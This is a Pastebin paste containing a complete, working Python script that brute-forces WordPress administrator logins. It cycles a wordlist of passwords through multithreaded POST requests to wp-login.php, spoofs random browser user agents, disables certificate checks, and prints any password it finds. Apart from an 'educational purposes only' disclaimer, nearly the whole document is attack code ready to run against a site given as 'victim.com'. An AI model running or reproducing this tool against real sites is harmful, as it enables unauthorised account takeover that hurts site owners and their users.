Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # WordPress Brute Force by Skip420
- #
- # Inspired by xSecurity's WordPress Brute Muliththreading
- #
- # Tested on Wordpress 3.x and 4.x
- #
- # Disclaimer:
- #
- # This exploit is intended for educational purposes only and the author
- # can not be held liable for any kind of damages done whatsoever to your machine,
- # or damages caused by some other,creative application of this exploit.
- # In any case you disagree with the above statement,stop here.
- #
- # Requirements:
- #
- # 1) python's httplib2 lib
- # Installation: pip install httplib2
- #
- # Features:
- #
- # 1) Multithreading
- # 2) http and https protocols
- # 3) Random User Agent
- import urllib, httplib, httplib2
- import socket, sys, os, os.path, optparse, random
- from threading import Thread
- from time import sleep
- banner = """
- ___ ___ __
- | Y .-----.----.--| .-----.----.-----.-----.-----.
- |. | | _ | _| _ | _ | _| -__|__ --|__ --|
- |. / \ |_____|__| |_____| __|__| |_____|_____|_____|
- |: | |__|
- |::.|:. |
- `--- ---'
- _______ __ _______
- | _ .----.--.--| |_.-----| _ .-----.----.----.-----.
- |. 1 | _| | | _| -__|. 1___| _ | _| __| -__|
- |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|
- |: 1 \ |: |
- |::.. . / |::.|
- `-------' `---'
- WordBruteForce
- by:
- Skip420
- """
- def randomAgentGen():
- userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
- 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
- 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
- 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
- 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
- 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
- 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
- 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
- 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
- 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
- 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
- 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
- UA = random.choice(userAgent)
- return UA
- def urlCMS(url):
- if url[:8] != "https://" and url[:7] != "http://":
- print('[X] You must insert http:// or https:// procotol')
- os._exit(1)
- # Page login
- url = url+'/wp-login.php'
- return url
- def bodyCMS(username,pwd):
- body = { 'log':username,
- 'pwd':pwd,
- 'wp-submit':'Login',
- 'testcookie':'1' }
- return body
- def headersCMS(UA):
- headers = { 'User-Agent': UA,
- 'Content-type': 'application/x-www-form-urlencoded',
- 'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
- return headers
- def responseCMS(response):
- if response['set-cookie'].split(" ")[-1] == "httponly":
- return "1"
- def connection(url,user,password,UA,timeout):
- username = user
- pwd = password
- http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)
- # HTTP POST Data
- body = bodyCMS(username,pwd)
- # Headers
- headers = headersCMS(UA)
- try:
- response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))
- if str(response.status)[0] == "4" or str(response.status)[0] == "5":
- print('\n[X] HTTP error, code: '+str(response.status))
- os._exit(1)
- if responseCMS(response) == "1":
- print('\n')
- print('[!] Password FOUND!!!')
- print('')
- print('[!] Username: '+user+' Password: '+password)
- os._exit(0)
- except socket.timeout:
- print('\n[X] Connection Timeout')
- os._exit(1)
- except socket.error:
- print('\n[X] Connection Refused')
- os._exit(1)
- except httplib.ResponseNotReady:
- print('\n[X] Server Not Responding')
- os._exit(1)
- except httplib2.ServerNotFoundError:
- print('\n[X] Server Not Found')
- os._exit(1)
- except httplib2.HttpLib2Error:
- print('\n[X] Connection Error!!')
- os._exit(1)
- commandList = optparse.OptionParser('usage: %prog -t TARGET_URL -u USER -w WORDLIST_FILE [-p PORT] [--timeout sec]\n')
- commandList.add_option('-t', '--target',
- action="store",
- help="Insert URL: http[s]://www.victim.com",
- )
- commandList.add_option('-u', '--username',
- action="store",
- help="Insert username",
- )
- commandList.add_option('-w', '--wordfilelist',
- action="store",
- help="Insert wordlist files",
- )
- commandList.add_option('-p', '--port',
- action="store",
- default=0,
- type="int",
- help="[Insert Port Number] - Default 80 or 443",
- )
- commandList.add_option('--timeout',
- action="store",
- default=10,
- type="int",
- help="[Timeout Value] - Default 10",
- )
- options, remainder = commandList.parse_args()
- # Check args
- if not options.target or not options.username or not options.wordfilelist:
- print(banner)
- print
- commandList.print_help()
- sys.exit(1)
- # args to vars
- url = options.target
- user = options.username
- password = options.wordfilelist
- timeout = options.timeout
- # Check if Wordlist file exists and has readable
- if not os.path.isfile(password) and not os.access(password, os.R_OK):
- print "[X] Wordlist file is missing or is not readable"
- sys.exit(1)
- # Open and read Wordlist file
- wordlist = open(password).read().split("\n")
- # Total lines (password) in Wordlist file
- totalwordlist = len(wordlist)
- # Gen Random UserAgent
- UA = randomAgentGen()
- # Url to url+login_cms_page
- url = urlCMS(url)
- print(banner)
- print
- print('[+] Target.....: '+options.target)
- print('[+] Wordlist...: '+str(totalwordlist))
- print('[+] Username...: '+user)
- print('')
- print('[+] Connecting...')
- print('')
- # Reset var for "progress bar"
- count = 0
- threads = []
- for pwd in wordlist:
- count += 1
- t = Thread(target=connection, args=(url,user,pwd,UA,timeout))
- t.start()
- threads.append(t)
- sys.stdout.write('\r')
- sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))
- sys.stdout.flush()
- sleep(0.210)
- for a in threads:
- a.join()
- # no passwords found
- print('\n[X] Password NOT found :(')
Add Comment
Please, Sign In to add comment
